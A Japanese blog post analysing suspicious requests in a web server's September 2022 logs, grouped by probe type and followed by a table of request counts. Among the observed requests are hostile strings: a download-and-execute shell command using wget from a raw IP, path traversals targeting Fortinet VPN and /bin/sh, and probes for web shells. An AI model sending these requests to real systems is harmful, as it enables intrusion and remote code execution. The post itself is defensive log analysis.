webサーバのログの分析2022 9月分

2022-11-03 技術系

公開している web サーバのログから通常のアクセスではない通信について分析しました。

多かったリクエスト

.envの調査

/.env

VPN製品の脆弱性

複数のVPN製品の脆弱性に対しての調査する通信みたいです。
 
Palo Alto Networks (CVE-2019-1579)
Fortinet (CVE-2018-13379)
Pulse Secure (CVE-2019-11510)

複数の SSL VPN 製品の脆弱性に関する注意喚起

/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

PHPUnitのevalをリモート実行

PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Wordpressの情報取集

ログイン画面の調査

/wp-login.php
/wp-admin/css/

wlwmanifest.xmlの調査

Windows Live Writerというツールの設定ファイルがあるかの調査

/wp1/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/web/wp-includes/wlwmanifest.xml
/test/wp-includes/wlwmanifest.xml
/site/wp-includes/wlwmanifest.xml
/cms/wp-includes/wlwmanifest.xml
/blog/wp-includes/wlwmanifest.xml
/shop/wp-includes/wlwmanifest.xml
/2019/wp-includes/wlwmanifest.xml

参考情報

JVNDB-2017-005280 - JVN iPedia - 脆弱性対策情報データベース

不審な通信の一覧

uri count
/test_404_page/ 324
/.env 264
/sellers.json 140
/wp-login.php 129
/uploads/ 117
/wp-admin/css/ 116
/sites/default/files/ 116
/.well-known/ 116
/images/ 115
/admin/controller/extension/extension/ 115
* 99
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 96
/actuator/gateway/routes 54
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 51
mstshash=Domain 48
/boaform/admin/formLogin 40
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 37
mstshash=Administr 36
/xmlrpc.php?rsd 36
/wp1/wp-includes/wlwmanifest.xml 34
/wp/wp-includes/wlwmanifest.xml 34
/wordpress/wp-includes/wlwmanifest.xml 34
/web/wp-includes/wlwmanifest.xml 34
/test/wp-includes/wlwmanifest.xml 34
/site/wp-includes/wlwmanifest.xml 34
/cms/wp-includes/wlwmanifest.xml 34
/blog/wp-includes/wlwmanifest.xml 34
/Electron/download/windows/%5CProgram%20Files%5C3CX%20Phone%20System%5CData%5CDB%5Cbase%5C16384%5C16393 34
\x00\x00\x00\x00\x00\x00\x00 33
/shop/wp-includes/wlwmanifest.xml 33
/2019/wp-includes/wlwmanifest.xml 33
/post/wp-login.php 30
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 30
/owa/auth/logon.aspx 30
/wp-includes/wlwmanifest.xml 29
/owa/auth/x.js 28
/.git/config 28
5.254.17.35:4444 25
/wp2/wp-includes/wlwmanifest.xml 25
/website/wp-includes/wlwmanifest.xml 25
/sito/wp-includes/wlwmanifest.xml 25
/news/wp-includes/wlwmanifest.xml 25
/spywall/timeConfig.php 23
/actuator/health 23
/2020/wp-includes/wlwmanifest.xml 23
/up.php 21
/app-ads.txt 21
/.well-known/security.txt 21
google.com:443 20
/_ignition/execute-solution 19
/wso.php 18
/sitemap.xml 18
/shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws 18
/upload.php 17
/olux.php 17
/HNAP1/ 17
//.env 17
/wp-content/themes/seotheme/mar.php 16
/shell.php 16
/pools/default/buckets 10
/pools 10
/media/wp-includes/wlwmanifest.xml 10
/manager/html 10
/indoxploit.php 10
/hudson 10
/docs/cplugError.html/ 10
/doc.php 10
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 10
/__Additional 10
/Portal0000.htm 10
/Portal/Portal.mwsl 10
/CSS/Miniweb.css 10
/2018/wp-includes/wlwmanifest.xml 10
/0bef 10
/.DS_Store 10
7 9
/wp-includes/wp-class.php 9
/wp-includes/ID3/license.txt 9
/version 9

ブログランキング・にほんブログ村へ follow us in feedly

関連記事

新着記事

comments powered by Disqus